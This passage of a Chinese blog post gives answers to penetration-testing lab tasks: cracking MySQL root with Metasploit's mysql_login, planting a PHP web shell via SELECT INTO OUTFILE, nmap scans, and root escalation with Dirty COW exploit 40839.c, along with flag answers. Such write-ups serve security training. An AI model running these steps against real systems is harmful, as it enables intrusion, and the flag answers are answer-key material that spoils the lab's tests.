<li>利用渗透机kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码，并将破解mysql的密码所需的模块当作flag提交(账户为root);</li>
</ol>
<p>​        <strong>mysql_login</strong></p>
<ol start="4">
<li>利用渗透机kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码，并将mysql的密码当作flag提交(账户为root);</li>
</ol>
<p>​        <strong>zxcvbnm</strong></p>
<ol start="5">
<li>利用上题中的数据库账户密码在web界面登陆数据库，通过select ‘’************ ‘C:/phpstudy/WWW/shell.php’语句向服务器提交名为shell.php的一句话木马，将语句中<em>号的明文作为flag提交（</em>为大写字母或者空格）；</li>
</ol>
<p>​        <strong>INTO OUTFILE</strong>  </p>
<ol start="6">
<li>使用菜刀连接上题中的shell.php,下载服务器根目录下的压缩包，将压缩包中的flag提交</li>
</ol>
<p>​        <strong>huaixiaohai</strong></p>
<h2 id="任务九：利用python脚本进行web渗透测试"><a href="#任务九：利用python脚本进行web渗透测试" class="headerlink" title="任务九：利用python脚本进行web渗透测试"></a>任务九：利用python脚本进行web渗透测试</h2><ol>
<li>使用渗透机场景kali中工具扫描确定Web服务器场景地址，浏览网站flag.html页面，并将flag.html中的flag提交；</li>
</ol>
<p>​        <strong>WXL0601</strong></p>
<ol start="2">
<li>进入渗透机场景win7操作系统，完善桌面上的tupian.py文件，填写该文件当中空缺的FLAG1字符串，并将改字符串作为flag提交；</li>
</ol>
<p>​        <strong>re</strong></p>
<ol start="3">
<li>进入渗透机场景win7操作系统，完善桌面上的tupian.py文件，填写该文件当中空缺的FLAG2字符串，并将改字符串作为flag提交；</li>
</ol>
<p>​        <strong>url</strong></p>
<ol start="4">
<li>进入渗透机场景win7操作系统，完善桌面上的tupian.py文件，填写该文件当中空缺的FLAG3字符串，并将改字符串作为flag提交；</li>
</ol>
<p>​        <strong>src</strong></p>
<ol start="5">
<li>进入渗透机场景win7操作系统,完善桌面上的tupian.py文件，填写该文件当中空缺的FLAG字符串并运行成功文件会自动爬取网站tupian.php的图片，将爬取的图片数量作为flag提交；</li>
</ol>
<p>​        <strong>29</strong></p>
<ol start="6">
<li>结合网站的引导信息，参考源码再次将tupian.py进行修改，使tupian.py只爬取flag图片。再次运行tupian.py,并将修改的字符与爬取到的图片中的内容做为flag提交（提交格式为：修改的字符_图片内容）；</li>
</ol>
<p>​        <strong>BEIJINGANDBISAI</strong></p>
<h2 id="任务十：Linux操作系统渗透测试"><a href="#任务十：Linux操作系统渗透测试" class="headerlink" title="任务十：Linux操作系统渗透测试"></a>任务十：Linux操作系统渗透测试</h2><ol>
<li><p>通过本地PC中渗透测试平台Kali对服务器场景Linux进行操作系统扫描渗透测试，并将该操作显示结果“OS Details：”之后的字符串作为FLAG提交；</p>
<pre><code>  `nmap -O 172.16.101.250`
</code></pre>
</li>
</ol>
<p><img src="https://s2.loli.net/2023/04/21/5CiBSjUu74x1wMD.png"></p>
<ol start="2">
<li>通过本地PC中渗透测试平台Kali对服务器场景Linux进行系统服务及版本扫描渗透测试，并将该操作显示结果中MySQL数据库对应的服务版本信息字符串作为FLAG提交；</li>
</ol>
<p>​        <code>nmap -A 172.16.101.250</code></p>
<p>   <img src="https://s2.loli.net/2023/04/21/zQ29sjcgwl8LMp5.png"></p>
<ol start="3">
<li><strong>通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试，将该场景/var/www/html目录中唯一一个后缀为.html文件的文件名称作为FLAG提交；</strong></li>
</ol>
<p>​        <strong>1、先爆破数据库密码，用九头蛇或者是msf</strong></p>
<p>​        <strong>2、拿到密码插入一句话木马 <code>select "" into outfile "/var/www/html/shell.php";</code></strong></p>
<p>​        <strong>3、蚁剑连接就能看见</strong></p>
<p>​        <a target="_blank" rel="noopener" href="http://172.16.101.250/shell.php">http://172.16.101.250/shell.php</a></p>
<p>  <img src="https://s2.loli.net/2023/04/21/6bgMD2SeX3VIRtc.png"></p>
<ol start="4">
<li>通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试，将该场景/var/www/html目录中唯一一个后缀为.html文件的文件内容作为FLAG提交；</li>
</ol>
<p><img src="https://s2.loli.net/2023/04/21/aziH6p4KyVtYcqe.png"></p>
<ol start="5">
<li>通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试，将该场景/root目录中唯一一个后缀为.bmp文件的文件名称作为FLAG提交； </li>
</ol>
<p><img src="https://s2.loli.net/2023/04/21/Bjyax85wpWiDvTb.png"></p>
<ol start="6">
<li>通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试，将该场景/root目录中唯一一个后缀为.bmp的图片文件中的英文单词作为FLAG提交。</li>
</ol>
<p><img src="https://s2.loli.net/2023/04/21/Bjyax85wpWiDvTb.png"></p>
<p>​        <strong>第二种方法，提权</strong></p>
<p>​        <strong>1、爆破出test密码，</strong></p>
<p>​        <strong>2、查看版本型号发现是2.6.32</strong></p>
<p>​    <img src="https://s2.loli.net/2023/04/21/JfCUnipQ2d6oD8N.png"></p>
<p>​        <strong>3、在kali中查找exp</strong></p>
<p>​        <code>searchsploit COW | grep 2.6</code></p>
<p>​        <code>40839.c</code></p>
<p>​    <img src="https://s2.loli.net/2023/04/21/fWbdGrTvwZkKDcE.png"></p>
<p>​        <strong>补全目录</strong></p>
<p>​        <code>locate linux/local/40839.c</code></p>
<p>​        <code>uname -a</code></p>
<p>​        <strong>4、gcc编译</strong></p>
<p>​        <code>gcc -pthread exp.c -o exp -lcrypt</code></p>
<p>​        <code>ls</code></p>
<p>​        <code>./exp</code></p>
<p>​        <strong>设置密码</strong></p>
<p>​        <strong>新账号firefart  密码：</strong></p>
<h2 id="任务十一：Windows操作系统渗透测试"><a href="#任务十一：Windows操作系统渗透测试" class="headerlink" title="任务十一：Windows操作系统渗透测试"></a>任务十一：Windows操作系统渗透测试</h2><ol>
<li>通过本地PC中渗透测试平台Kali对服务器场景Windows进行操作系统扫描渗透测试，并将该操作显示结果“Running：”之后的字符串作为FLAG提交； </li>
</ol>
<p>​        <strong>Microsoft Windows XP|2003</strong></p>
<ol start="2">
<li>通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试，并将该操作显示结果中445端口对应的服务版本信息字符串作为FLAG提交；</li>
</ol>
<p>​        <strong>microsoft-ds</strong></p>
<ol start="3">
<li>通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试，将该场景网络连接信息中的DNS信息作为FLAG提交;(例如114.114.114.114)；</li>
</ol>
<p>​        <strong>202.103.24.68</strong></p>
<ol start="4">
<li>通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试，将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文件名称作为FLAG提交； </li>
</ol>
<p>​        <strong>gbyuikvc</strong></p>
<ol start="5">
<li>通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试，将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文档内容作为FLAG提交；</li>
</ol>
<p>​        <strong>serbvuik</strong></p>
<ol start="6">
<li>通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试，将该场景桌面上222文件夹中唯一一个图片中的英文单词作为FLAG提交</li>
</ol>
<p>​        <strong>presistence</strong></p>

            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://yunhea.com" rel="external nofollow noreferrer">yunhea</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://yunhea.com/2021/11/03/yi-ci-mou-ping-tai-shang-mian-de-ti-mu-jie-ti-guo-cheng/">http://yunhea.com/2021/11/03/yi-ci-mou-ping-tai-shang-mian-de-ti-mu-jie-ti-guo-cheng/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="http://yunhea.com" target="_blank">yunhea</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/web%E6%B8%97%E9%80%8F/">
                                    <span class="chip bg-color">-web渗透</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">

<div id="article-share">  
    
</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/zhifuzhifuerweima.jpeg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/weixinzhifuerweima.jpeg" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>
            
        </div>
    </div>

    
        <link rel="stylesheet" href="/libs/gitalk/gitalk.css">
<link rel="stylesheet" href="/css/my-gitalk.css">

<div class="card gitalk-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="gitalk-container" class="card-content"></div>
</div>

<script src="/libs/gitalk/gitalk.min.js"></script>
<script>
    let gitalk = new Gitalk({
        clientID: '',
        clientSecret: '',
        repo: '',
        owner: '',
        admin: null,
        id: '2021-11-03T22-05-31',
        distractionFreeMode: false  // Facebook-like distraction free mode
    });

    gitalk.render('gitalk-container');
</script>
    

    <!-- 聊天工具 -->
    
<script src="//code.tidio.co/.js"></script>
<script>
    $(document).ready(function () {
        setInterval(change_Tidio, 50);
        function change_Tidio() {
            var tidio = $("#tidio-chat iframe");
            if (tidio.css("display") == "block" && $(window).width() > 977) {
                document.getElementById("tidio-chat-iframe").style.bottom = ($("div#backTop.top-scroll").css("display") == "none" && $(window).width() > 977) > 0 ? "-40px" : ($("div.toc-title").length && $(window).width() > 977) > 0 ? "85px" : "20px";
                document.getElementById("tidio-chat-iframe").style.right = "-15px";
                document.getElementById("tidio-chat-iframe").style.height = parseInt(tidio.css("height")) >= 520 ? "520px" : tidio.css("height");
                document.getElementById("tidio-chat-iframe").style.zIndex = "997";
            }
            else if (tidio.css("display") == "block" && $(window).width() > 601 && $(window).width() < 992) {
                document.getElementById("tidio-chat-iframe").style.bottom = ($("div#backTop.top-scroll").css("display") == "none" && 601 < $(window).width() < 992) > 0 ? "-40px" : "20px";
                document.getElementById("tidio-chat-iframe").style.right = "-15px";
                document.getElementById("tidio-chat-iframe").style.zIndex = "997";
            }
            else if (tidio.css("display") == "block" && $(window).width() < 601 && parseInt(tidio.css("height")) < 230) {
                document.getElementById("tidio-chat-iframe").style.bottom = ($("div#backTop.top-scroll").css("display") == "none" && $(window).width() < 601) > 0 ? "-10px" : "45px";
                document.getElementById("tidio-chat-iframe").style.zIndex = "997";
            }
            if (tidio.css("display") == "block" && $(window).width() < 601 && parseInt(tidio.css("height")) >= 230) {
                document.getElementById("tidio-chat-iframe").style.zIndex = "998";
            }
            setTimeout(() => {
                $("#tidio-chat iframe").contents().find("button.moveFromRightLabel-enter-done").hide();
            }, 3000);
            
        }

    });
</script>


    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: '7Qhl5yDb61rzI3kCtMWhFqK4-gzGzoHsz',
        appKey: '3UYLfB1OzrwLSmQO5JkXQzt5',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: 'just go go'
    });
</script>

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2021/12/13/ji-xue-xiao-pang-zhan-ce-shi/">
                    <div class="card-image">
                        
                        <img src="https://s2.loli.net/2023/04/21/GZtR7kEdKcHSL4r.jpg" class="responsive-img" alt="记学校旁站测试">
                        
                        <span class="card-title">记学校旁站测试</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            记学校旁站测试
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2021-12-13
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/web%E6%B8%97%E9%80%8F/" class="post-category">
                                    -web渗透
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web%E6%B8%97%E9%80%8F/">
                        <span class="chip bg-color">-web渗透</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/10/20/ctfshow-shua-ti-ji-lu/">
                    <div class="card-image">
                        
                        <img src="https://s2.loli.net/2023/04/21/N19MhBQJcDEYxot.png" class="responsive-img" alt="ctfshow刷题记录">
                        
                        <span class="card-title">ctfshow刷题记录</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            ctfshow刷题记录
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-10-20
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/web%E6%B8%97%E9%80%8F/" class="post-category">
                                    -web渗透
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web%E6%B8%97%E9%80%8F/">
                        <span class="chip bg-color">-web渗透</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('150')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: yunhea的博客<br />'
            + '文章作者: yunhea<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>

    
<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->

    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h1, h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>


<script src="https://cdn.bootcss.com/mathjax/2.7.5/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script>
    MathJax.Hub.Config({
        tex2jax: {inlineMath: [['$', '$'], ['\(', '\)']]}
    });
</script>

    <style>
    span.footer-music {
        margin-left: 5px;
    }

    span.footer-music a {
        margin-right: 7px;
    }
</style>
<footer class="page-footer bg-color">
    <div class="container row center-align"
        style="margin-bottom: 15px !important;">
        <div class="col s12 m8 25 copy-right">
            @&nbsp;<span id="year">2020</span>
            <a href="http://yunhea.com" target="_blank">yunhea</a>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span class="white-color">
                    17.6k
                </span>&nbsp;字
                
                    
                        
                                    
                                            
                                                    
                                                        <span id="sitetime">载入运行时间...</span>
                                                        <span class="footer-music">
<a href="https://github.com/yunheb" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub"
    data-position="top" data-delay="50">
    <i class="fab fa-github"></i>
</a>



<a href="mailto:3032336028@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我"
    data-position="top" data-delay="50">
    <i class="fas fa-envelope-open"></i>
</a>



<a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=3032336028" class="tooltipped"
    target="_blank" data-tooltip="QQ联系我: 3032336028" data-position="top" data-delay="50">
    <i class="fab fa-qq"></i>
</a>







<a href="/" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top"
    data-delay="50">
    <i class="fas fa-rss"></i>
</a>
</span>
                                                        <script>
                                                            function siteTime() {
                                                                var seconds = 1000;
                                                                var minutes = seconds * 60;
                                                                var hours = minutes * 60;
                                                                var days = hours * 24;
                                                                var years = days * 365;
                                                                var today = new Date();
                                                                var startYear = "2020";
                                                                var startMonth = "2";
                                                                var startDate = "28";
                                                                var startHour = "0";
                                                                var startMinute = "0";
                                                                var startSecond = "0";
                                                                var todayYear = today.getFullYear();
                                                                var todayMonth = today.getMonth() + 1;
                                                                var todayDate = today.getDate();
                                                                var todayHour = today.getHours();
                                                                var todayMinute = today.getMinutes();
                                                                var todaySecond = today.getSeconds();
                                                                var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                                                                var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                                                                var diff = t2 - t1;
                                                                var diffYears = Math.floor(diff / years);
                                                                var diffDays = Math.floor((diff / days) - diffYears * 365);
                                                                var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                                                                var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                                                                    minutes);
                                                                var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                                                                    diffMinutes * minutes) / seconds);
                                                                if (startYear == todayYear) {
                                                                    document.getElementById("year").innerHTML = todayYear;
                                                                    document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                                                                        " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                                                                } else {
                                                                    document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                                                                    document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                                                                        " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                                                                }
                                                            }
                                                            setInterval(siteTime, 1000);
                                                        </script>
                                                        
        </div>
    </div>
</footer>

<div class="progress-bar"></div>
    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
});
</script>
    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Global site tag (gtag.js) - Google Analytics -->

<script async src="https://www.googletagmanager.com/gtag/js?id=G-2RESQZ27F8"></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag() {
        dataLayer.push(arguments);
    }

    gtag('js', new Date());
